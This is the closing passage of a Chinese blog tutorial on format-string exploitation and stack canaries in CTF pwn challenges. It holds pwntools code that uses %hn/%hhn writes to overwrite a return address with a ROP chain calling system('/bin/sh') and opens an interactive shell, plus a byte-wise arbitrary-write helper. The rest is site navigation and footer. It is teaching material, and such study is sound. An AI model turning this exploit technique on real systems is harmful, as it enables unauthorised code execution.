class="comment">#通过将第25个参数传入格式化字符串，将第39个参数的值改为返回地址</span></span><br><span class="line">payload=<span class="string">b&#x27;%&#x27;</span>+<span class="built_in">str</span>(ret&amp;<span class="number">0xffff</span>).encode()+<span class="string">b&#x27;c%&#x27;</span>+<span class="built_in">str</span>(<span class="number">25</span>).encode()+<span class="string">b&#x27;$hn&#x27;</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;food: &#x27;</span>,payload)</span><br><span class="line"><span class="comment">#覆盖返回地址为ptr（pop_rdi; ret）</span></span><br><span class="line">overlap(ret,ptr,<span class="number">25</span>,<span class="number">39</span>)</span><br><span class="line"><span class="comment">#覆盖返回地址+8的位置为binsh字符串地址</span></span><br><span class="line">overlap(ret+<span class="number">8</span>,libc.search(<span class="string">b&#x27;/bin/sh&#x27;</span>).__next__(),<span class="number">25</span>,<span class="number">39</span>)</span><br><span class="line"><span class="comment">#覆盖返回地址+16的位置为system函数的地址</span></span><br><span class="line">overlap(ret+<span class="number">16</span>,libc.sym.system,<span class="number">25</span>,<span class="number">39</span>)</span><br><span class="line"><span class="comment">#至此，退出循环执行ROP后即可获取系统操作权限</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;food: &#x27;</span>,payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#简单的格式化字符串利用函数，将dest地址的后8字节循环更改成ptr对应的字节，off1与off2为上述</span></span><br><span class="line">（<span class="number">1</span>）与（<span class="number">2</span>）两个栈地址在格式化字符串中的偏移</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">overlap</span>(<span class="params">dest,ptr,off1,off2</span>):</span><br><span class="line">d=dest&amp;<span class="number">0xff</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line"><span class="keyword">if</span> <span class="keyword">not</span> ptr:</span><br><span class="line"><span class="keyword">break</span></span><br><span class="line">payload=<span class="string">b&#x27;%&#x27;</span>+<span class="built_in">str</span>(d).encode()+<span class="string">b&#x27;c%&#x27;</span>+<span class="built_in">str</span>(off1).encode()+<span class="string">b&#x27;$hhn&#x27;</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;food: &#x27;</span>,payload)</span><br><span class="line">f=ptr&amp;<span class="number">0xff</span></span><br><span class="line">payload=<span class="string">b&#x27;%&#x27;</span>+<span class="built_in">str</span>(f).encode()+<span class="string">b&#x27;c%&#x27;</span>+<span class="built_in">str</span>(off2).encode()+<span class="string">b&#x27;$hhn&#x27;</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;food: &#x27;</span>,payload)</span><br><span class="line">d+=<span class="number">1</span></span><br><span class="line">ptr&gt;&gt;=<span class="number">8</span></span><br></pre></td></tr></table></figure>


  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/DeePunk42">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">1.</span> <span class="toc-text">原理</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A0%BC%E5%BC%8F%E5%8C%96%E8%BE%93%E5%87%BA%E5%87%BD%E6%95%B0"><span class="toc-number">1.1.</span> <span class="toc-text">格式化输出函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8D%A0%E4%BD%8D%E7%AC%A6%E8%AF%AD%E6%B3%95"><span class="toc-number">1.2.</span> <span class="toc-text">占位符语法</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#parameter"><span class="toc-number">1.2.0.1.</span> <span class="toc-text">parameter</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#type"><span class="toc-number">1.2.0.2.</span> <span class="toc-text">type</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8"><span class="toc-number">2.</span> <span class="toc-text">利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%84%E9%9C%B2%E6%A0%88%E4%B8%8A%E6%95%B0%E6%8D%AE"><span class="toc-number">2.1.</span> <span class="toc-text">泄露栈上数据</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%84%E9%9C%B2libc%E5%9C%B0%E5%9D%80"><span class="toc-number">3.</span> <span class="toc-text">泄露libc地址</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%84%E9%9C%B2%E6%A0%88%E4%B8%8A%E5%9C%B0%E5%9D%80%E6%8C%87%E5%90%91%E7%9A%84%E6%95%B0%E6%8D%AE"><span class="toc-number">3.1.</span> <span class="toc-text">泄露栈上地址指向的数据</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A6%86%E7%9B%96%E6%A0%88%E4%B8%8A%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80"><span class="toc-number">3.2.</span> <span class="toc-text">覆盖栈上任意地址</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E5%AE%9E%E4%BE%8B"><span class="toc-number">3.2.0.1.</span> <span class="toc-text">实例</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Canary"><span class="toc-number">4.</span> <span class="toc-text">Canary</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B0%B4%E6%B0%B4%E5%AE%9E%E4%BE%8B"><span class="toc-number">5.</span> <span class="toc-text">水水实例</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fmtstr-payload"><span class="toc-number"></span> <span class="toc-text">fmtstr_payload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%9B%E9%98%B6%E6%93%8D%E4%BD%9C"><span class="toc-number"></span> <span class="toc-text">进阶操作</span></a>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&text=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&title=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&is_video=false&description=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=PWN从入门到出入平安（一）——格式化字符与Canary&body=Check out this article: http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&title=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&title=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&title=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&title=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&name=PWN从入门到出入平安（一）——格式化字符与Canary&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&t=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021-2023
    DeePunk
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/DeePunk42">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
